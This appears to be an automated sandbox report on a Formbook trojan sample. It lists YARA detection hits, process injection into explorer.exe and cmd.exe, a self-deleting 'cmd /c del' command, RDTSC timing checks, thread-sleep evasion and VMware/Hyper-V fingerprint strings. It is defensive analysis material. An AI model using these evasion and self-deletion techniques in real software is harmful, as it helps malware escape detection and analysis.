Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: n0srYVYMDI.exe PID: 7516, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmd.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: n0srYVYMDI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@12/1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026A759 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,4_2_0026A759
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n0srYVYMDI.exe.logJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
          Source: n0srYVYMDI.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: n0srYVYMDI.exe | Virustotal: Detection: 70%
          Source: n0srYVYMDI.exe | ReversingLabs: Detection: 82%
          Source: unknown | Process created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Process created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Section loaded: iconcodecservice.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: n0srYVYMDI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: n0srYVYMDI.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmd.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: n0srYVYMDI.exe, n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041B854 push edi; ret | 2_2_0041B85C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041E96F push ebp; ret | 2_2_0041E986
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041E903 push edx; ret | 2_2_0041E907
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041D475 push eax; ret | 2_2_0041D4C8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041D4C2 push eax; ret | 2_2_0041D4C8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041D4CB push eax; ret | 2_2_0041D532
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0041D52C push eax; ret | 2_2_0041D532
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017509AD push ecx; mov dword ptr [esp], ecx | 2_2_017509B6
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB00B1E push esp; retn 0000h | 3_2_0FB00B1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB00B02 push esp; retn 0000h | 3_2_0FB00B03
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB009B5 push esp; retn 0000h | 3_2_0FB00AE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10DC69B5 push esp; retn 0000h | 3_2_10DC6AE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10DC6B1E push esp; retn 0000h | 3_2_10DC6B1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_10DC6B02 push esp; retn 0000h | 3_2_10DC6B03
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_002571ED push ecx; ret | 4_2_00257200
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_0025722B push ecx; ret | 4_2_0025723E
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_03BD09AD push ecx; mov dword ptr [esp], ecx | 4_2_03BD09B6
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7D4C2 push eax; ret | 4_2_02F7D4C8
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7D4CB push eax; ret | 4_2_02F7D532
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7D475 push eax; ret | 4_2_02F7D4C8
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7D52C push eax; ret | 4_2_02F7D532
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7B854 push edi; ret | 4_2_02F7B85C
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7E96F push ebp; ret | 4_2_02F7E986
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F7E903 push edx; ret | 4_2_02F7E907
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_03ABEB02 push esp; retn 0000h | 4_2_03ABEB03
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_03ABEB1E push esp; retn 0000h | 4_2_03ABEB1F
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_03ABE9B5 push esp; retn 0000h | 4_2_03ABEAE7
          Source: n0srYVYMDI.exe | Static PE information: section name: .text entropy: 7.718614846166296
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 2F69904 second address: 2F6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 2F69B6E second address: 2F69B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: 1610000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: 3360000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: 3180000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: 9BF0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: ABF0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: AE10000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Memory allocated: BE10000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_00409AA0 rdtsc | 2_2_00409AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2474
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 7467
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 887
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 864
          Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 2219
          Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 7753
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_3-13961
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cmd.exe | API coverage: 1.0 %
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe TID: 7536 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep count: 2474 > 30
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep time: -4948000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep count: 7467 > 30
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep time: -14934000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916 | Thread sleep count: 2219 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916 | Thread sleep time: -4438000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916 | Thread sleep count: 7753 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7916 | Thread sleep time: -15506000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_0025589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose | 4_2_0025589A
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00250207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove | 4_2_00250207
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00263E66 FindFirstFileW,FindNextFileW,FindClose | 4_2_00263E66
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00254EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW | 4_2_00254EC1
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_0024532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose | 4_2_0024532E
          Source: explorer.exe, 00000003.00000000.1735394383.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000000.1735394383.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000002.4177203521.000000000997A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000000.1738643727.000000000C9FE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.4177203521.000000000997A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
